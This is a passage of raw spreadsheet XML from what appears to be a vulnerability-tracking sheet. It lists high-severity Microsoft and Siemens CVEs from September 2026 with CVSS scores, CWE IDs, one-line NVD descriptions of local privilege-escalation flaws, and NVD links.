s="5" t="n"><v>0.002</v></c><c r="I891" s="5" t="inlineStr" /><c r="J891" s="5" t="inlineStr" /><c r="K891" s="5" t="inlineStr" /><c r="L891" s="5" t="inlineStr" /><c r="M891" s="5" t="inlineStr" /><c r="N891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P891" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q891" s="5" t="inlineStr" /><c r="R891" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S891" s="5" t="inlineStr"><is><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is></c><c r="T891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t></is></c></row><row r="892"><c r="A892" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C892" s="5" t="inlineStr"><is><t>CVE-2026-62654</t></is></c><c r="D892" s="5" t="n"><v>7</v></c><c r="E892" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F892" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G892" s="5" t="inlineStr" /><c r="H892" s="5" t="n"><v>0.001</v></c><c r="I892" s="5" t="inlineStr" /><c r="J892" s="5" t="inlineStr" /><c r="K892" s="5" t="inlineStr" /><c r="L892" s="5" t="inlineStr" /><c r="M892" s="5" t="inlineStr" /><c r="N892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q892" s="5" t="inlineStr" /><c r="R892" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="S892" s="5" t="inlineStr"><is><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is></c><c r="T892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t></is></c></row><row r="893"><c r="A893" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C893" s="5" t="inlineStr"><is><t>CVE-2026-62694</t></is></c><c r="D893" s="5" t="n"><v>7</v></c><c r="E893" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G893" s="5" t="inlineStr" /><c r="H893" s="5" t="n"><v>0.003</v></c><c r="I893" s="5" t="inlineStr" /><c r="J893" s="5" t="inlineStr" /><c r="K893" s="5" t="inlineStr" /><c r="L893" s="5" t="inlineStr" /><c r="M893" s="5" t="inlineStr" /><c r="N893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P893" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q893" s="5" t="inlineStr" /><c r="R893" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S893" s="5" t="inlineStr"><is><t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t></is></c></row><row r="894"><c r="A894" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C894" s="5" t="inlineStr"><is><t>CVE-2026-68824</t></is></c><c r="D894" s="5" t="n"><v>7</v></c><c r="E894" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G894" s="5" t="inlineStr" /><c r="H894" s="5" t="n"><v>0.002</v></c><c r="I894" s="5" t="inlineStr" /><c r="J894" s="5" t="inlineStr" /><c r="K894" s="5" t="inlineStr" /><c r="L894" s="5" t="inlineStr" /><c r="M894" s="5" t="inlineStr" /><c r="N894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q894" s="5" t="inlineStr" /><c r="R894" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S894" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t></is></c></row><row r="895"><c r="A895" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C895" s="5" t="inlineStr"><is><t>CVE-2026-68825</t></is></c><c r="D895" s="5" t="n"><v>7</v></c><c r="E895" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G895" s="5" t="inlineStr" /><c r="H895" s="5" t="n"><v>0.003</v></c><c r="I895" s="5" t="inlineStr" /><c r="J895" s="5" t="inlineStr" /><c r="K895" s="5" t="inlineStr" /><c r="L895" s="5" t="inlineStr" /><c r="M895" s="5" t="inlineStr" /><c r="N895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P895" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q895" s="5" t="inlineStr" /><c r="R895" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S895" s="5" t="inlineStr"><is><t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t></is></c></row><row r="896"><c r="A896" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C896" s="5" t="inlineStr"><is><t>CVE-2026-68837</t></is></c><c r="D896" s="5" t="n"><v>7</v></c><c r="E896" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G896" s="5" t="inlineStr" /><c r="H896" s="5" t="n"><v>0.002</v></c><c r="I896" s="5" t="inlineStr" /><c r="J896" s="5" t="inlineStr" /><c r="K896" s="5" t="inlineStr" /><c r="L896" s="5" t="inlineStr" /><c r="M896" s="5" t="inlineStr" /><c r="N896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P896" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q896" s="5" t="inlineStr" /><c r="R896" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S896" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t></is></c></row><row r="897"><c r="A897" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C897" s="5" t="inlineStr"><is><t>CVE-2026-68840</t></is></c><c r="D897" s="5" t="n"><v>7</v></c><c r="E897" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G897" s="5" t="inlineStr" /><c r="H897" s="5" t="n"><v>0.002</v></c><c r="I897" s="5" t="inlineStr" /><c r="J897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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97" s="5" t="inlineStr" /><c r="M897" s="5" t="inlineStr" /><c r="N897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P897" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q897" s="5" t="inlineStr" /><c r="R897" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S897" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t></is></c></row><row r="898"><c r="A898" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C898" s="5" t="inlineStr"><is><t>CVE-2026-68847</t></is></c><c r="D898" s="5" t="n"><v>7</v></c><c r="E898" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G898" s="5" t="inlineStr" /><c r="H898" s="5" t="n"><v>0.002</v></c><c r="I898" s="5" t="inlineStr" /><c r="J898" s="5" t="inlineStr" /><c r="K898" s="5" t="inlineStr" /><c r="L898" s="5" t="inlineStr" /><c r="M898" s="5" t="inlineStr" /><c r="N898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q898" s="5" t="inlineStr" /><c r="R898" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S898" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t></is></c></row><row r="899"><c r="A899" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C899" s="5" t="inlineStr"><is><t>CVE-2026-68884</t></is></c><c r="D899" s="5" t="n"><v>7</v></c><c r="E899" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G899" s="5" t="inlineStr" /><c r="H899" s="5" t="n"><v>0.003</v></c><c r="I899" s="5" t="inlineStr" /><c r="J899" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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99" s="5" t="inlineStr" /><c r="M899" s="5" t="inlineStr" /><c r="N899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P899" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q899" s="5" t="inlineStr" /><c r="R899" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S899" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t></is></c></row><row r="900"><c r="A900" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C900" s="5" t="inlineStr"><is><t>CVE-2026-68897</t></is></c><c r="D900" s="5" t="n"><v>7</v></c><c r="E900" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G900" s="5" t="inlineStr" /><c r="H900" s="5" t="n"><v>0.002</v></c><c r="I900" s="5" t="inlineStr" /><c r="J900" s="5" t="inlineStr" /><c r="K900" s="5" t="inlineStr" /><c r="L900" s="5" t="inlineStr" /><c r="M900" s="5" t="inlineStr" /><c r="N900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P900" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q900" s="5" t="inlineStr" /><c r="R900" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S900" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t></is></c></row><row r="901"><c r="A901" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C901" s="5" t="inlineStr"><is><t>CVE-2026-69275</t></is></c><c r="D901" s="5" t="n"><v>7</v></c><c r="E901" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G901" s="5" t="inlineStr" /><c r="H901" s="5" t="n"><v>0.002</v></c><c r="I901" s="5" t="inlineStr" /><c r="J901" s="5" t="inlineStr" /><c r="K901" s="5" t="inlineStr" /><c r="L901" s="5" t="inlineStr" /><c r="M901" s="5" t="inlineStr" /><c r="N901" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P901" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q901" s="5" t="inlineStr" /><c r="R901" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S901" s="5" t="inlineStr"><is><t>Use after free in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69275</t></is></c></row><row r="902"><c r="A902" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C902" s="5" t="inlineStr"><is><t>CVE-2026-69279</t></is></c><c r="D902" s="5" t="n"><v>7</v></c><c r="E902" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G902" s="5" t="inlineStr" /><c r="H902" s="5" t="n"><v>0.003</v></c><c r="I902" s="5" t="inlineStr" /><c r="J902" s="5" t="inlineStr" /><c r="K902" s="5" t="inlineStr" /><c r="L902" s="5" t="inlineStr" /><c r="M902" s="5" t="inlineStr" /><c r="N902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P902" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q902" s="5" t="inlineStr" /><c r="R902" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S902" s="5" t="inlineStr"><is><t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69279</t></is></c></row><row r="903"><c r="A903" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C903" s="5" t="inlineStr"><is><t>CVE-2026-69280</t></is></c><c r="D903" s="5" t="n"><v>7</v></c><c r="E903" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G903" s="5" t="inlineStr" /><c r="H903" s="5" t="n"><v>0.002</v></c><c r="I903" s="5" t="inlineStr" /><c r="J903" s="5" t="inlineStr" /><c r="K903" s="5" t="inlineStr" /><c r="L903" s="5" t="inlineStr" /><c r="M903" s="5" t="inlineStr" /><c r="N903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P903" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q903" s="5" t="inlineStr" /><c r="R903" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S903" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69280</t></is></c></row><row r="904"><c r="A904" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C904" s="5" t="inlineStr"><is><t>CVE-2026-69281</t></is></c><c r="D904" s="5" t="n"><v>7</v></c><c r="E904" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G904" s="5" t="inlineStr" /><c r="H904" s="5" t="n"><v>0.003</v></c><c r="I904" s="5" t="inlineStr" /><c r="J904" s="5" t="inlineStr" /><c r="K904" s="5" t="inlineStr" /><c r="L904" s="5" t="inlineStr" /><c r="M904" s="5" t="inlineStr" /><c r="N904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P904" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q904" s="5" t="inlineStr" /><c r="R904" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S904" s="5" t="inlineStr"><is><t>Use after free in Windows License Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69281</t></is></c></row><row r="905"><c r="A905" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C905" s="5" t="inlineStr"><is><t>CVE-2026-69287</t></is></c><c r="D905" s="5" t="n"><v>7</v></c><c r="E905" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G905" s="5" t="inlineStr" /><c r="H905" s="5" t="n"><v>0.002</v></c><c r="I905" s="5" t="inlineStr" /><c r="J905" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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05" s="5" t="inlineStr" /><c r="M905" s="5" t="inlineStr" /><c r="N905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P905" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q905" s="5" t="inlineStr" /><c r="R905" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S905" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69287</t></is></c></row><row r="906"><c r="A906" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C906" s="5" t="inlineStr"><is><t>CVE-2026-69292</t></is></c><c r="D906" s="5" t="n"><v>7</v></c><c r="E906" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G906" s="5" t="inlineStr" /><c r="H906" s="5" t="n"><v>0.002</v></c><c r="I906" s="5" t="inlineStr" /><c r="J906" s="5" t="inlineStr" /><c r="K906" s="5" t="inlineStr" /><c r="L906" s="5" t="inlineStr" /><c r="M906" s="5" t="inlineStr" /><c r="N906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P906" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q906" s="5" t="inlineStr" /><c r="R906" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S906" s="5" t="inlineStr"><is><t>Double free in Remote Desktop Gateway Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69292</t></is></c></row><row r="907"><c r="A907" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C907" s="5" t="inlineStr"><is><t>CVE-2026-69299</t></is></c><c r="D907" s="5" t="n"><v>7</v></c><c r="E907" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G907" s="5" t="inlineStr" /><c r="H907" s="5" t="n"><v>0.002</v></c><c r="I907" s="5" t="inlineStr" /><c r="J907" s="5" t="inlineStr" /><c r="K907" s="5" t="inlineStr" /><c r="L907" s="5" t="inlineStr" /><c r="M907" s="5" t="inlineStr" /><c r="N907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P907" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q907" s="5" t="inlineStr" /><c r="R907" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S907" s="5" t="inlineStr"><is><t>Use after free in Microsoft COM for Windows allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t></is></c></row><row r="908"><c r="A908" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C908" s="5" t="inlineStr"><is><t>CVE-2026-69300</t></is></c><c r="D908" s="5" t="n"><v>7</v></c><c r="E908" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G908" s="5" t="inlineStr" /><c r="H908" s="5" t="n"><v>0.002</v></c><c r="I908" s="5" t="inlineStr" /><c r="J908" s="5" t="inlineStr" /><c r="K908" s="5" t="inlineStr" /><c r="L908" s="5" t="inlineStr" /><c r="M908" s="5" t="inlineStr" /><c r="N908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P908" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q908" s="5" t="inlineStr" /><c r="R908" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S908" s="5" t="inlineStr"><is><t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t></is></c></row><row r="909"><c r="A909" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C909" s="5" t="inlineStr"><is><t>CVE-2026-69309</t></is></c><c r="D909" s="5" t="n"><v>7</v></c><c r="E909" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G909" s="5" t="inlineStr" /><c r="H909" s="5" t="n"><v>0.003</v></c><c r="I909" s="5" t="inlineStr" /><c r="J909" s="5" t="inlineStr" /><c r="K909" s="5" t="inlineStr" /><c r="L909" s="5" t="inlineStr" /><c r="M909" s="5" t="inlineStr" /><c r="N909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P909" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q909" s="5" t="inlineStr" /><c r="R909" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S909" s="5" t="inlineStr"><is><t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t></is></c></row><row r="910"><c r="A910" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C910" s="5" t="inlineStr"><is><t>CVE-2026-69310</t></is></c><c r="D910" s="5" t="n"><v>7</v></c><c r="E910" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G910" s="5" t="inlineStr" /><c r="H910" s="5" t="n"><v>0.003</v></c><c r="I910" s="5" t="inlineStr" /><c r="J910" s="5" t="inlineStr" /><c r="K910" s="5" t="inlineStr" /><c r="L910" s="5" t="inlineStr" /><c r="M910" s="5" t="inlineStr" /><c r="N910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P910" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q910" s="5" t="inlineStr" /><c r="R910" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S910" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t></is></c></row><row r="911"><c r="A911" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C911" s="5" t="inlineStr"><is><t>CVE-2026-69311</t></is></c><c r="D911" s="5" t="n"><v>7</v></c><c r="E911" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G911" s="5" t="inlineStr" /><c r="H911" s="5" t="n"><v>0.003</v></c><c r="I911" s="5" t="inlineStr" /><c r="J911" s="5" t="inlineStr" /><c r="K911" s="5" t="inlineStr" /><c r="L911" s="5" t="inlineStr" /><c r="M911" s="5" t="inlineStr" /><c r="N911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P911" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q911" s="5" t="inlineStr" /><c r="R911" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S911" s="5" t="inlineStr"><is><t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t></is></c></row><row r="912"><c r="A912" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C912" s="5" t="inlineStr"><is><t>CVE-2026-69319</t></is></c><c r="D912" s="5" t="n"><v>7</v></c><c r="E912" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G912" s="5" t="inlineStr" /><c r="H912" s="5" t="n"><v>0.002</v></c><c r="I912" s="5" t="inlineStr" /><c r="J912" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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12" s="5" t="inlineStr" /><c r="M912" s="5" t="inlineStr" /><c r="N912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P912" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q912" s="5" t="inlineStr" /><c r="R912" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S912" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t></is></c></row><row r="913"><c r="A913" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C913" s="5" t="inlineStr"><is><t>CVE-2026-69331</t></is></c><c r="D913" s="5" t="n"><v>7</v></c><c r="E913" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G913" s="5" t="inlineStr" /><c r="H913" s="5" t="n"><v>0.002</v></c><c r="I913" s="5" t="inlineStr" /><c r="J913" s="5" t="inlineStr" /><c r="K913" s="5" t="inlineStr" /><c r="L913" s="5" t="inlineStr" /><c r="M913" s="5" t="inlineStr" /><c r="N913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P913" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q913" s="5" t="inlineStr" /><c r="R913" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S913" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t></is></c></row><row r="914"><c r="A914" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C914" s="5" t="inlineStr"><is><t>CVE-2026-69333</t></is></c><c r="D914" s="5" t="n"><v>7</v></c><c r="E914" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G914" s="5" t="inlineStr" /><c r="H914" s="5" t="n"><v>0.003</v></c><c r="I914" s="5" t="inlineStr" /><c r="J914" s="5" t="inlineStr" /><c r="K914" s="5" t="inlineStr" /><c r="L914" s="5" t="inlineStr" /><c r="M914" s="5" t="inlineStr" /><c r="N914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P914" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q914" s="5" t="inlineStr" /><c r="R914" s="5" 